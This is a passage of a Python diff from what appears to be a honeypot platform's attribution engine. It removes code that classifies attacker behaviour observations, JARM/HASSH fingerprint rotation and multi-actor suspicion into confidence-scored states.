|
||||
)
|
||||
|
||||
|
||||
def aggregate_numeric(
|
||||
observations: Sequence[dict[str, Any]],
|
||||
) -> AttributionState:
|
||||
"""Numeric merger — for primitives whose ``value`` is an int /
|
||||
float (e.g. ``toolchain.c2.beacon_interval_ms``,
|
||||
``motor.paste_burst_rate``).
|
||||
|
||||
Compares the EWMA of the recent window against the EWMA of the
|
||||
older window; reports dispersion as coefficient of variation.
|
||||
|
||||
* < ``MIN_OBSERVATIONS_FOR_STATE`` → ``unknown``
|
||||
* recent CV < ``NUMERIC_STABLE_DISPERSION_PCT`` *and* mean shift
|
||||
from older window < ``NUMERIC_DRIFT_MEAN_SHIFT_PCT`` → ``stable``
|
||||
* mean shifted >= ``NUMERIC_DRIFT_MEAN_SHIFT_PCT`` → ``drifting``
|
||||
* recent CV > ``NUMERIC_CONFLICT_DISPERSION_PCT`` → ``conflicted``
|
||||
* otherwise → ``stable`` (falling-through case for moderate
|
||||
dispersion that hasn't yet become drift)
|
||||
|
||||
Confidence on stable/drifting is ``1 - min(CV, 1.0)`` —
|
||||
tighter dispersion = higher confidence. Conflicted is ``0.5``
|
||||
by convention; we cannot meaningfully claim certainty in a
|
||||
statistic computed over a degenerate sample.
|
||||
|
||||
``current_value`` is the recent EWMA, not the last raw
|
||||
observation: numeric primitives are noisy by nature and
|
||||
surfacing the smoothed estimate keeps the dashboard from
|
||||
flapping on every tick. ``multi_actor`` is *not* a numeric state
|
||||
in v0 — bimodal distributions belong to the categorical
|
||||
detector once the primitive's value space is bucketed.
|
||||
"""
|
||||
n = len(observations)
|
||||
last_ts = float(observations[-1].get("ts", 0.0)) if observations else 0.0
|
||||
if n < _T.MIN_OBSERVATIONS_FOR_STATE:
|
||||
return AttributionState(
|
||||
current_value=_safe_float(observations[-1].get("value")) if n else None,
|
||||
state="unknown",
|
||||
confidence=0.0,
|
||||
observation_count=n,
|
||||
last_observation_ts=last_ts,
|
||||
)
|
||||
|
||||
window = _T.CATEGORICAL_WINDOW_N
|
||||
recent_vals = [_safe_float(o.get("value")) for o in observations[-window:]]
|
||||
older_vals = [
|
||||
_safe_float(o.get("value"))
|
||||
for o in observations[-2 * window: -window]
|
||||
]
|
||||
recent_mean = _ewma(recent_vals, _T.NUMERIC_EWMA_ALPHA)
|
||||
recent_cv = _coef_of_variation(recent_vals, recent_mean)
|
||||
|
||||
if recent_cv > _T.NUMERIC_CONFLICT_DISPERSION_PCT:
|
||||
return AttributionState(
|
||||
current_value=recent_mean,
|
||||
state="conflicted",
|
||||
confidence=0.5,
|
||||
observation_count=n,
|
||||
last_observation_ts=last_ts,
|
||||
)
|
||||
|
||||
if older_vals:
|
||||
older_mean = _ewma(older_vals, _T.NUMERIC_EWMA_ALPHA)
|
||||
denom = abs(older_mean) if older_mean != 0 else 1.0
|
||||
mean_shift = abs(recent_mean - older_mean) / denom
|
||||
if mean_shift >= _T.NUMERIC_DRIFT_MEAN_SHIFT_PCT:
|
||||
return AttributionState(
|
||||
current_value=recent_mean,
|
||||
state="drifting",
|
||||
confidence=max(0.0, 1.0 - min(recent_cv, 1.0)),
|
||||
observation_count=n,
|
||||
last_observation_ts=last_ts,
|
||||
)
|
||||
|
||||
return AttributionState(
|
||||
current_value=recent_mean,
|
||||
state="stable",
|
||||
confidence=max(0.0, 1.0 - min(recent_cv, 1.0)),
|
||||
observation_count=n,
|
||||
last_observation_ts=last_ts,
|
||||
)
|
||||
|
||||
|
||||
def aggregate_hash(
|
||||
observations: Sequence[dict[str, Any]],
|
||||
) -> AttributionState:
|
||||
"""Hash merger — for rotation-resistant fingerprints
|
||||
(``toolchain.tls.jarm_server``, ``toolchain.ssh.hassh_client``).
|
||||
|
||||
The merger does NOT recompute hashes; DEBT-032
|
||||
(``decnet.correlation.fingerprint_rotation``) already produces
|
||||
one observation per rotation event. The state machine counts
|
||||
distinct hash values inside ``HASH_DRIFT_WINDOW_SECS`` of the
|
||||
most recent observation:
|
||||
|
||||
* 0 rotations (single hash, any count) → ``stable``
|
||||
* 1 to ``HASH_DRIFT_MAX`` rotations within window → ``drifting``
|
||||
* > ``HASH_DRIFT_MAX`` rotations within window → ``conflicted``
|
||||
|
||||
``unknown`` fires only on empty input — a single hash with one
|
||||
observation is enough signal to say "stable", because hashes
|
||||
don't have a noisy baseline the way categorical/numeric
|
||||
primitives do.
|
||||
|
||||
``current_value`` is the most recent hash. Confidence is
|
||||
``1 / (1 + rotations_in_window)`` — one rotation halves
|
||||
confidence, two thirds it, etc.
|
||||
"""
|
||||
n = len(observations)
|
||||
if n == 0:
|
||||
return _unknown(0.0, count=0)
|
||||
last_ts = float(observations[-1].get("ts", 0.0))
|
||||
last_value = observations[-1].get("value")
|
||||
|
||||
window_start = last_ts - _T.HASH_DRIFT_WINDOW_SECS
|
||||
in_window = [
|
||||
o for o in observations
|
||||
if float(o.get("ts", 0.0)) >= window_start
|
||||
]
|
||||
distinct = len({o.get("value") for o in in_window if o.get("value") is not None})
|
||||
rotations = max(0, distinct - 1)
|
||||
confidence = 1.0 / (1.0 + rotations)
|
||||
|
||||
if rotations == 0:
|
||||
state = "stable"
|
||||
elif rotations <= _T.HASH_DRIFT_MAX:
|
||||
state = "drifting"
|
||||
else:
|
||||
state = "conflicted"
|
||||
|
||||
return AttributionState(
|
||||
current_value=last_value,
|
||||
state=state,
|
||||
confidence=confidence,
|
||||
observation_count=n,
|
||||
last_observation_ts=last_ts,
|
||||
)
|
||||
|
||||
|
||||
def _ewma(values: Sequence[float], alpha: float) -> float:
|
||||
"""Single-pass EWMA. Empty input is illegal; callers gate on
|
||||
``MIN_OBSERVATIONS_FOR_STATE`` upstream."""
|
||||
it = iter(values)
|
||||
smoothed = next(it)
|
||||
for v in it:
|
||||
smoothed = alpha * v + (1.0 - alpha) * smoothed
|
||||
return smoothed
|
||||
|
||||
|
||||
def _coef_of_variation(values: Sequence[float], mean: float) -> float:
|
||||
"""Population-style CV = stdev / |mean|. Returns 0 on a constant
|
||||
signal; returns +inf-equivalent (1e9) when the mean is exactly
|
||||
zero and the signal isn't constant — so the conflicted threshold
|
||||
fires without us having to special-case it upstream."""
|
||||
if not values:
|
||||
return 0.0
|
||||
diffs_sq = [(v - mean) ** 2 for v in values]
|
||||
variance = sum(diffs_sq) / len(values)
|
||||
stdev = variance ** 0.5
|
||||
if mean == 0:
|
||||
return 0.0 if stdev == 0 else 1e9
|
||||
return stdev / abs(mean)
|
||||
|
||||
|
||||
def _safe_float(value: Any) -> float:
|
||||
"""Defensive coercion — observations may carry value=None on
|
||||
unknown-emitter primitives. Treat None as 0.0; the dispersion
|
||||
check will surface the resulting flat baseline as 'stable'
|
||||
which is the honest answer for a single-observation primitive
|
||||
that hasn't fired yet."""
|
||||
if value is None:
|
||||
return 0.0
|
||||
if isinstance(value, bool):
|
||||
return 1.0 if value else 0.0
|
||||
return float(value)
|
||||
|
||||
|
||||
def aggregate_categorical(
|
||||
observations: Sequence[dict[str, Any]],
|
||||
) -> AttributionState:
|
||||
"""Categorical merger — the dominant case for BEHAVE-SHELL.
|
||||
|
||||
Compares the recent N-window against the older N-window. With
|
||||
``CATEGORICAL_WINDOW_N = 5`` and ``CATEGORICAL_MAJORITY_THRESHOLD
|
||||
= 4``:
|
||||
|
||||
* fewer than ``MIN_OBSERVATIONS_FOR_STATE`` → ``unknown``
|
||||
* recent window has a clear majority + matches older window → ``stable``
|
||||
* recent window has a clear majority + differs from older window → ``drifting``
|
||||
* recent window split + alternation pattern across observations → ``multi_actor``
|
||||
* recent window split + no alternation → ``conflicted``
|
||||
|
||||
Confidence is the recent-window agreement ratio; ``multi_actor``
|
||||
is capped at ``MULTI_ACTOR_MAX_CONFIDENCE``. The merger returns
|
||||
the most-recent observation's value as ``current_value``
|
||||
regardless of state — the dashboard wants a value to render
|
||||
even on ``conflicted`` rows.
|
||||
"""
|
||||
n = len(observations)
|
||||
last_ts = float(observations[-1].get("ts", 0.0))
|
||||
last_value = observations[-1].get("value")
|
||||
if n < _T.MIN_OBSERVATIONS_FOR_STATE:
|
||||
return AttributionState(
|
||||
current_value=last_value,
|
||||
state="unknown",
|
||||
confidence=0.0,
|
||||
observation_count=n,
|
||||
last_observation_ts=last_ts,
|
||||
)
|
||||
|
||||
window = _T.CATEGORICAL_WINDOW_N
|
||||
recent = observations[-window:]
|
||||
recent_values = [o.get("value") for o in recent]
|
||||
recent_count = Counter(recent_values)
|
||||
top_value, top_count = recent_count.most_common(1)[0]
|
||||
recent_size = len(recent)
|
||||
confidence = top_count / recent_size
|
||||
|
||||
is_recent_clear = top_count >= min(
|
||||
_T.CATEGORICAL_MAJORITY_THRESHOLD, recent_size,
|
||||
)
|
||||
|
||||
if not is_recent_clear:
|
||||
# Split recent window. Distinguish multi_actor (alternation)
|
||||
# from random conflict.
|
||||
if _is_alternation(observations):
|
||||
return AttributionState(
|
||||
current_value=last_value,
|
||||
state="multi_actor",
|
||||
confidence=min(confidence, _T.MULTI_ACTOR_MAX_CONFIDENCE),
|
||||
observation_count=n,
|
||||
last_observation_ts=last_ts,
|
||||
)
|
||||
return AttributionState(
|
||||
current_value=last_value,
|
||||
state="conflicted",
|
||||
confidence=confidence,
|
||||
observation_count=n,
|
||||
last_observation_ts=last_ts,
|
||||
)
|
||||
|
||||
# Recent window has a clear majority. Compare to the prior
|
||||
# window to decide stable vs drifting.
|
||||
older = observations[-2 * window: -window]
|
||||
if not older:
|
||||
# Only one window's worth of data — call it stable. The
|
||||
# dashboard already gates "unknown" on
|
||||
# MIN_OBSERVATIONS_FOR_STATE so this branch is reachable
|
||||
# only when the operator has produced enough observations
|
||||
# for one full window but not two.
|
||||
return AttributionState(
|
||||
current_value=top_value,
|
||||
state="stable",
|
||||
confidence=confidence,
|
||||
observation_count=n,
|
||||
last_observation_ts=last_ts,
|
||||
)
|
||||
|
||||
older_values = [o.get("value") for o in older]
|
||||
older_count = Counter(older_values)
|
||||
older_top_value, older_top_count = older_count.most_common(1)[0]
|
||||
older_size = len(older)
|
||||
older_clear = older_top_count >= min(
|
||||
_T.CATEGORICAL_MAJORITY_THRESHOLD, older_size,
|
||||
)
|
||||
|
||||
if not older_clear:
|
||||
# Older window was itself conflicted; we just stabilised.
|
||||
# That's drift in the colloquial sense — the attacker
|
||||
# converged onto a single behaviour.
|
||||
return AttributionState(
|
||||
current_value=top_value,
|
||||
state="drifting",
|
||||
confidence=confidence,
|
||||
observation_count=n,
|
||||
last_observation_ts=last_ts,
|
||||
)
|
||||
|
||||
if older_top_value != top_value:
|
||||
return AttributionState(
|
||||
current_value=top_value,
|
||||
state="drifting",
|
||||
confidence=confidence,
|
||||
observation_count=n,
|
||||
last_observation_ts=last_ts,
|
||||
)
|
||||
return AttributionState(
|
||||
current_value=top_value,
|
||||
state="stable",
|
||||
confidence=confidence,
|
||||
observation_count=n,
|
||||
last_observation_ts=last_ts,
|
||||
)
|
||||
|
||||
|
||||
def _is_alternation(observations: Sequence[dict[str, Any]]) -> bool:
|
||||
"""Heuristic: do recent observations alternate between two values
|
||||
(operator A → B → A → B), as opposed to random thrashing?
|
||||
|
||||
Conservative: requires at least 4 observations in the window,
|
||||
exactly 2 distinct values, and that flips outnumber repeats by
|
||||
at least 2:1. ATTRIBUTION-ENGINE.md §"Open question 1" warns
|
||||
that flapping primitives on flaky networks look like two
|
||||
operators; this guard is what keeps the false-positive rate down.
|
||||
"""
|
||||
window = _T.CATEGORICAL_WINDOW_N
|
||||
recent = observations[-window:]
|
||||
if len(recent) < 4:
|
||||
return False
|
||||
values = [o.get("value") for o in recent]
|
||||
distinct = set(values)
|
||||
if len(distinct) != 2:
|
||||
return False
|
||||
flips = sum(
|
||||
1 for i in range(1, len(values)) if values[i] != values[i - 1]
|
||||
)
|
||||
repeats = (len(values) - 1) - flips
|
||||
return flips >= 2 * max(repeats, 1)
|
||||
|
||||
|
||||
def _unknown(last_ts: float, *, count: int) -> AttributionState:
|
||||
return AttributionState(
|
||||
current_value=None,
|
||||
state="unknown",
|
||||
confidence=0.0,
|
||||
observation_count=count,
|
||||
last_observation_ts=last_ts,
|
||||
)
|
||||
@@ -1,394 +0,0 @@
|
||||
"""Attribution-engine bus subscriber — v0 Phase 1 skeleton.
|
||||
|
||||
Subscribes to ``attacker.observation.>`` and, for each event, ensures
|
||||
the source attacker has a stub identity in ``attacker_identities``.
|
||||
Phase 1 does **not** invoke the merger or write
|
||||
``attribution_state`` rows; that wiring lands in Phase 4 once the
|
||||
Phase 2/3 mergers are in.
|
||||
|
||||
Pattern mirrors :mod:`decnet.correlation.reuse_worker`: bus-subscribe
|
||||
with a wake event, fall back to poll-only if the bus is unavailable,
|
||||
publish derived events with :func:`publish_safely`, log per-handler
|
||||
exceptions and continue.
|
||||
|
||||
Trigger isolation: the per-event handler is wrapped in a single
|
||||
try/except. Any exception is logged and the loop continues with the
|
||||
next event. This is the same posture BEHAVE-SHELL's
|
||||
``_handler.handle_session_ended`` adopts.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import contextlib
|
||||
from typing import Any
|
||||
|
||||
from decnet.bus import topics as _topics
|
||||
from decnet.bus.base import BaseBus
|
||||
from decnet.bus.factory import get_bus
|
||||
from decnet.bus.publish import (
|
||||
publish_safely,
|
||||
run_control_listener_signal as _run_control_listener_signal,
|
||||
run_health_heartbeat as _run_health_heartbeat,
|
||||
)
|
||||
from decnet.correlation.attribution import _thresholds as _T
|
||||
from decnet.correlation.attribution.aggregate import aggregate_observations
|
||||
from decnet.logging import get_logger
|
||||
from decnet.web.db.repository import BaseRepository
|
||||
|
||||
try:
|
||||
from behave_shell.spec import (
|
||||
PRIMITIVE_REGISTRY,
|
||||
ValueKind,
|
||||
)
|
||||
_BEHAVE_REGISTRY_AVAILABLE = True
|
||||
except ImportError: # pragma: no cover
|
||||
PRIMITIVE_REGISTRY = {}
|
||||
ValueKind = None
|
||||
_BEHAVE_REGISTRY_AVAILABLE = False
|
||||
|
||||
log = get_logger("correlation.attribution_worker")
|
||||
|
||||
_WORKER_NAME = "attribution"
|
||||
_OBSERVATION_PATTERN = f"{_topics.ATTACKER}.{_topics.ATTACKER_OBSERVATION_PREFIX}.>"
|
||||
|
||||
|
||||
async def run_attribution_loop(
|
||||
repo: BaseRepository,
|
||||
*,
|
||||
shutdown: asyncio.Event | None = None,
|
||||
multi_actor_tick_secs: float | None = None,
|
||||
) -> None:
|
||||
"""Run the attribution worker until cancelled.
|
||||
|
||||
Three concurrent tasks under one supervisor:
|
||||
|
||||
1. ``_consume_observations`` — bus subscription on
|
||||
``attacker.observation.>``; per-event handler upserts state.
|
||||
2. ``_multi_actor_tick`` — periodic walk of ``attribution_state``
|
||||
firing ``attribution.profile.multi_actor_suspected`` when an
|
||||
identity carries ≥ ``MULTI_ACTOR_MIN_PRIMITIVES`` rows in
|
||||
``multi_actor`` state. Phase 5.
|
||||
3. Health + control standard channels.
|
||||
|
||||
*shutdown* is an optional external stop signal.
|
||||
*multi_actor_tick_secs* overrides ``_thresholds.MULTI_ACTOR_TICK_SECS``
|
||||
(tests use this to drive the correlator without sleeping for a
|
||||
minute).
|
||||
"""
|
||||
log.info("attribution worker started pattern=%s", _OBSERVATION_PATTERN)
|
||||
|
||||
bus: BaseBus | None = None
|
||||
sub_task: asyncio.Task | None = None
|
||||
tick_task: asyncio.Task | None = None
|
||||
heartbeat_task: asyncio.Task | None = None
|
||||
control_task: asyncio.Task | None = None
|
||||
tick_secs = (
|
||||
multi_actor_tick_secs
|
||||
if multi_actor_tick_secs is not None
|
||||
else _T.MULTI_ACTOR_TICK_SECS
|
||||
)
|
||||
try:
|
||||
candidate = get_bus(client_name=f"{_WORKER_NAME}-correlator")
|
||||
await candidate.connect()
|
||||
bus = candidate
|
||||
sub_task = asyncio.create_task(
|
||||
_consume_observations(bus, repo),
|
||||
)
|
||||
tick_task = asyncio.create_task(
|
||||
_multi_actor_tick_loop(bus, repo, tick_secs),
|
||||
)
|
||||
heartbeat_task = asyncio.create_task(
|
||||
_run_health_heartbeat(bus, _WORKER_NAME),
|
||||
)
|
||||
control_task = asyncio.create_task(
|
||||
_run_control_listener_signal(bus, _WORKER_NAME),
|
||||
)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
log.warning(
|
||||
"attribution worker: bus unavailable, idle until bus returns: %s",
|
||||
exc,
|
||||
)
|
||||
|
||||
if shutdown is None:
|
||||
shutdown = asyncio.Event()
|
||||
|
||||
try:
|
||||
await shutdown.wait()
|
||||
except (asyncio.CancelledError, KeyboardInterrupt):
|
||||
log.info("attribution worker stopped")
|
||||
finally:
|
||||
for task in (sub_task, tick_task, heartbeat_task, control_task):
|
||||
if task is None:
|
||||
continue
|
||||
task.cancel()
|
||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||
await task
|
||||
if bus is not None:
|
||||
with contextlib.suppress(Exception):
|
||||
await bus.close()
|
||||
|
||||
|
||||
async def _consume_observations(
|
||||
bus: BaseBus, repo: BaseRepository,
|
||||
) -> None:
|
||||
"""Pull events off ``attacker.observation.>`` and dispatch each
|
||||
to :func:`handle_observation_event`.
|
||||
|
||||
Per-event exceptions are caught and logged; the subscription
|
||||
survives bad payloads. If the subscription itself dies (bus
|
||||
disconnect), the worker idles — the supervisor systemd unit
|
||||
will restart on a clean exit.
|
||||
"""
|
||||
try:
|
||||
sub = bus.subscribe(_OBSERVATION_PATTERN)
|
||||
async with sub:
|
||||
async for event in sub:
|
||||
try:
|
||||
await handle_observation_event(bus, repo, event)
|
||||
except Exception: # noqa: BLE001
|
||||
log.exception("attribution worker: handler failed")
|
||||
except asyncio.CancelledError:
|
||||
raise
|
||||
except Exception as exc: # noqa: BLE001
|
||||
log.warning(
|
||||
"attribution worker: subscriber for %s died (%s)",
|
||||
_OBSERVATION_PATTERN, exc,
|
||||
)
|
||||
|
||||
|
||||
async def handle_observation_event(
|
||||
bus: BaseBus | None,
|
||||
repo: BaseRepository,
|
||||
event: Any,
|
||||
) -> None:
|
||||
"""Handle one ``attacker.observation.<primitive>`` event.
|
||||
|
||||
Phase 1: ensure the source attacker has a stub identity, then log
|
||||
and return. Phase 4 will: load prior state, run merger, upsert
|
||||
new state, emit ``attribution.profile.state_changed`` on
|
||||
transition.
|
||||
|
||||
*event* is whatever shape :class:`BaseBus`'s subscription yields —
|
||||
a ``BusEvent`` with ``payload`` (dict) and ``event_type`` (str)
|
||||
fields. The payload carries the BEHAVE envelope plus DECNET-side
|
||||
``attacker_uuid`` denorm (see
|
||||
``decnet.profiler.behave_shell._handler._publish_observation``).
|
||||
"""
|
||||
payload = _payload_of(event)
|
||||
attacker_uuid = payload.get("attacker_uuid")
|
||||
primitive = payload.get("primitive")
|
||||
if not attacker_uuid or not primitive:
|
||||
log.debug(
|
||||
"attribution worker: skipping malformed event (uuid=%r primitive=%r)",
|
||||
attacker_uuid, primitive,
|
||||
)
|
||||
return
|
||||
identity_uuid = await repo.ensure_stub_identity_for_attacker(
|
||||
str(attacker_uuid),
|
||||
)
|
||||
if identity_uuid is None:
|
||||
log.info(
|
||||
"attribution worker: no Attacker row for uuid=%s yet; deferring",
|
||||
attacker_uuid,
|
||||
)
|
||||
return
|
||||
primitive_str = str(primitive)
|
||||
|
||||
# Load the full per-(identity, primitive) observation series.
|
||||
# v0 with 1:1 stub identities, this is the single attacker's
|
||||
# series; v1's clusterer makes it a cross-attacker union.
|
||||
observations = await repo.observations_for_identity_primitive(
|
||||
identity_uuid, primitive_str,
|
||||
)
|
||||
if not observations:
|
||||
log.debug(
|
||||
"attribution worker: no observations yet for identity=%s "
|
||||
"primitive=%s (race with upsert)",
|
||||
identity_uuid, primitive_str,
|
||||
)
|
||||
return
|
||||
|
||||
# Run merger.
|
||||
value_kind = _value_kind_for(primitive_str)
|
||||
new_state = aggregate_observations(observations, value_kind=value_kind)
|
||||
|
||||
# Load prior state to detect transitions.
|
||||
prior = await repo.get_attribution_state(identity_uuid, primitive_str)
|
||||
state_changed = prior is None or prior.get("state") != new_state.state
|
||||
|
||||
# Persist. last_change_ts is locked to the prior row when state is
|
||||
# unchanged so the dashboard's "stable since" timestamp doesn't
|
||||
# reset on every observation.
|
||||
if prior is not None and not state_changed:
|
||||
last_change_ts = float(prior.get("last_change_ts", new_state.last_observation_ts))
|
||||
else:
|
||||
last_change_ts = new_state.last_observation_ts
|
||||
await repo.upsert_attribution_state({
|
||||
"identity_uuid": identity_uuid,
|
||||
"primitive": primitive_str,
|
||||
"current_value": new_state.current_value,
|
||||
"state": new_state.state,
|
||||
"confidence": new_state.confidence,
|
||||
"observation_count": new_state.observation_count,
|
||||
"last_change_ts": last_change_ts,
|
||||
"last_observation_ts": new_state.last_observation_ts,
|
||||
})
|
||||
|
||||
# Emit state_changed only on transition. Idempotent re-runs (same
|
||||
# observations, same merger output) produce no event — matches
|
||||
# the loop-prevention invariant that ttp.tagged uses.
|
||||
if state_changed and bus is not None:
|
||||
await publish_safely(
|
||||
bus,
|
||||
_topics.attribution(_topics.ATTRIBUTION_PROFILE_STATE_CHANGED),
|
||||
{
|
||||
"identity_uuid": identity_uuid,
|
||||
"primitive": primitive_str,
|
||||
"old_state": prior.get("state") if prior else None,
|
||||
"new_state": new_state.state,
|
||||
"current_value": new_state.current_value,
|
||||
"confidence": new_state.confidence,
|
||||
"observation_count": new_state.observation_count,
|
||||
"ts": new_state.last_observation_ts,
|
||||
},
|
||||
event_type=_topics.ATTRIBUTION_PROFILE_STATE_CHANGED,
|
||||
)
|
||||
log.info(
|
||||
"attribution worker: identity=%s primitive=%s %s -> %s confidence=%.2f",
|
||||
identity_uuid, primitive_str,
|
||||
(prior or {}).get("state") or "<new>", new_state.state,
|
||||
new_state.confidence,
|
||||
)
|
||||
|
||||
|
||||
def _value_kind_for(primitive: str) -> str:
|
||||
"""Resolve a BEHAVE primitive name to the merger's ValueKind tag.
|
||||
|
||||
Maps the BEHAVE registry's ``ValueKind`` enum onto the three
|
||||
mergers the engine ships:
|
||||
|
||||
* ``CATEGORICAL`` / ``BOOL`` / ``FREE_STRING`` / ``ARRAY`` →
|
||||
``"categorical"`` (BOOL is a 2-cardinality categorical;
|
||||
FREE_STRING and ARRAY collapse to opaque-token categorical
|
||||
until a v1 specialised merger lands)
|
||||
* ``NUMERIC`` → ``"numeric"``
|
||||
* ``HASH`` → ``"hash"``
|
||||
|
||||
Unknown primitives (registry miss) default to categorical — the
|
||||
safest fallback because the categorical merger is one-outlier-
|
||||
tolerant and won't lie about confidence on noisy categorical
|
||||
data the way a numeric merger would on non-numeric values.
|
||||
"""
|
||||
if not _BEHAVE_REGISTRY_AVAILABLE:
|
||||
return "categorical"
|
||||
spec = PRIMITIVE_REGISTRY.get(primitive)
|
||||
if spec is None or ValueKind is None:
|
||||
return "categorical"
|
||||
if spec.kind is ValueKind.NUMERIC:
|
||||
return "numeric"
|
||||
if spec.kind is ValueKind.HASH:
|
||||
return "hash"
|
||||
return "categorical"
|
||||
|
||||
|
||||
def _payload_of(event: Any) -> dict[str, Any]:
|
||||
"""Extract the dict payload from a BusEvent or fall through if
|
||||
*event* is already a dict (test fixtures may pass either)."""
|
||||
payload = getattr(event, "payload", event)
|
||||
return payload if isinstance(payload, dict) else {}
|
||||
|
||||
|
||||
async def _multi_actor_tick_loop(
|
||||
bus: BaseBus, repo: BaseRepository, interval_secs: float,
|
||||
) -> None:
|
||||
"""Walk ``attribution_state`` every *interval_secs* and emit
|
||||
``attribution.profile.multi_actor_suspected`` for any identity
|
||||
whose multi_actor primitives changed since the last tick.
|
||||
|
||||
Dedupe: in-memory ``last_fired`` map keyed on identity_uuid →
|
||||
frozenset(primitives). Same primitive set as last fire → no
|
||||
re-emit. New primitive joining the set → re-emit. Set shrinks
|
||||
below ``MULTI_ACTOR_MIN_PRIMITIVES`` → drop the entry so it
|
||||
re-arms.
|
||||
|
||||
In-memory dedup is honest for v0 — restart-resets are
|
||||
acceptable because the underlying ``attribution_state`` rows
|
||||
persist; on first tick after restart we re-emit the current
|
||||
set. v1 may persist a ``multi_actor_suspect_log`` table.
|
||||
"""
|
||||
last_fired: dict[str, frozenset[str]] = {}
|
||||
try:
|
||||
while True:
|
||||
try:
|
||||
await tick_multi_actor(bus, repo, last_fired)
|
||||
except Exception: # noqa: BLE001
|
||||
log.exception("attribution worker: multi_actor tick failed")
|
||||
await asyncio.sleep(interval_secs)
|
||||
except asyncio.CancelledError:
|
||||
raise
|
||||
|
||||
|
||||
async def tick_multi_actor(
|
||||
bus: BaseBus | None,
|
||||
repo: BaseRepository,
|
||||
last_fired: dict[str, frozenset[str]],
|
||||
) -> int:
|
||||
"""One pass of the cross-primitive correlator. Public for tests.
|
||||
|
||||
Returns the number of ``multi_actor_suspected`` events emitted.
|
||||
"""
|
||||
candidates = await repo.list_multi_actor_identities()
|
||||
fired = 0
|
||||
seen_now: set[str] = set()
|
||||
for entry in candidates:
|
||||
identity_uuid = str(entry["identity_uuid"])
|
||||
primitives: list[str] = sorted(entry.get("primitives") or [])
|
||||
seen_now.add(identity_uuid)
|
||||
if len(primitives) < _T.MULTI_ACTOR_MIN_PRIMITIVES:
|
||||
# Repo already filters to >= 2 today; defensive against
|
||||
# future schema drift.
|
||||
continue
|
||||
signature = frozenset(primitives)
|
||||
if last_fired.get(identity_uuid) == signature:
|
||||
continue
|
||||
last_fired[identity_uuid] = signature
|
||||
if bus is None:
|
||||
continue
|
||||
await publish_safely(
|
||||
bus,
|
||||
_topics.attribution(_topics.ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED),
|
||||
{
|
||||
"identity_uuid": identity_uuid,
|
||||
"primitives": primitives,
|
||||
"evidence_summary": (
|
||||
f"{len(primitives)} primitives flagged multi_actor"
|
||||
),
|
||||
"confidence": _T.MULTI_ACTOR_MAX_CONFIDENCE,
|
||||
"ts": _now(),
|
||||
},
|
||||
event_type=_topics.ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED,
|
||||
)
|
||||
fired += 1
|
||||
log.info(
|
||||
"attribution worker: multi_actor_suspected identity=%s primitives=%s",
|
||||
identity_uuid, primitives,
|
||||
)
|
||||
# Rearm: any identity that was in last_fired but no longer in
|
||||
# candidates dropped below the threshold; remove so the next
|
||||
# qualifying flap re-fires.
|
||||
for stale in [k for k in last_fired if k not in seen_now]:
|
||||
del last_fired[stale]
|
||||
return fired
|
||||
|
||||
|
||||
def _now() -> float:
|
||||
"""Wall-clock seconds. Wrapped so tests can monkeypatch."""
|
||||
import time
|
||||
return time.time()
|
||||
|
||||
|
||||
__all__ = [
|
||||
"run_attribution_loop",
|
||||
"handle_observation_event",
|
||||
"tick_multi_actor",
|
||||
]
|
||||
@@ -1,153 +0,0 @@
|
||||
"""Attacker substrate-fingerprint rotation detection.
|
||||
|
||||
Called inline from the prober at each fingerprint emit site. Looks up
|
||||
the last persisted hash for ``(attacker_uuid, port, probe_type)``;
|
||||
when the new hash differs from the last one, emits a derived
|
||||
``attacker.fingerprint_rotated`` event (bus + RFC 5424 syslog) and
|
||||
stamps the ``Attacker`` row's rotation telemetry.
|
||||
|
||||
This is a pure library — no daemon, no async loop. The prober is the
|
||||
only producer. We just teach it to derive a second event on hash
|
||||
flip without standing up another worker (DEBT-032).
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import uuid as _uuid
|
||||
from dataclasses import dataclass
|
||||
from datetime import datetime
|
||||
from typing import Any, Callable, Literal
|
||||
|
||||
from sqlmodel import Session, select
|
||||
|
||||
from decnet.web.db.models import Attacker, AttackerFingerprintState
|
||||
|
||||
ProbeType = Literal["jarm", "hassh", "tcpfp"]
|
||||
RotationKind = Literal[
|
||||
"no_attacker_row", # caller raced ahead of correlator; skip silently
|
||||
"first_sighting", # state row created, no prior hash
|
||||
"unchanged", # same hash as last sighting
|
||||
"rotated", # hash differs; event emitted, Attacker stamped
|
||||
]
|
||||
|
||||
PublishFn = Callable[[str, dict[str, Any]], None]
|
||||
SyslogFn = Callable[[str, dict[str, Any]], None]
|
||||
|
||||
|
||||
@dataclass
|
||||
class RotationOutcome:
|
||||
"""Return shape of :func:`record_fingerprint`. Caller usually
|
||||
ignores it; useful for tests + tracing."""
|
||||
kind: RotationKind
|
||||
old_hash: str | None
|
||||
new_hash: str
|
||||
rotation_count: int
|
||||
|
||||
|
||||
_ROTATED_EVENT_TYPE = "attacker.fingerprint_rotated"
|
||||
|
||||
|
||||
def record_fingerprint(
|
||||
session: Session,
|
||||
*,
|
||||
attacker_ip: str,
|
||||
port: int,
|
||||
probe_type: ProbeType,
|
||||
new_hash: str,
|
||||
ts: datetime,
|
||||
publish_fn: PublishFn | None = None,
|
||||
syslog_fn: SyslogFn | None = None,
|
||||
) -> RotationOutcome:
|
||||
"""Upsert state row; on hash diff, emit derived event + stamp.
|
||||
|
||||
Resolves ``attacker_uuid`` from ``attacker_ip`` via the existing
|
||||
Attacker table. If no Attacker row exists yet (the prober raced
|
||||
ahead of the correlator), returns ``kind="no_attacker_row"`` and
|
||||
does nothing — the next probe cycle will pick it up once the
|
||||
correlator has caught up.
|
||||
|
||||
State upsert + Attacker stamp + publish + syslog are committed in
|
||||
one transaction so a partial failure can't desync state from
|
||||
what was emitted.
|
||||
"""
|
||||
attacker = session.exec(
|
||||
select(Attacker).where(Attacker.ip == attacker_ip)
|
||||
).first()
|
||||
if attacker is None:
|
||||
return RotationOutcome(
|
||||
kind="no_attacker_row",
|
||||
old_hash=None,
|
||||
new_hash=new_hash,
|
||||
rotation_count=0,
|
||||
)
|
||||
|
||||
row = session.exec(
|
||||
select(AttackerFingerprintState).where(
|
||||
AttackerFingerprintState.attacker_uuid == attacker.uuid,
|
||||
AttackerFingerprintState.port == port,
|
||||
AttackerFingerprintState.probe_type == probe_type,
|
||||
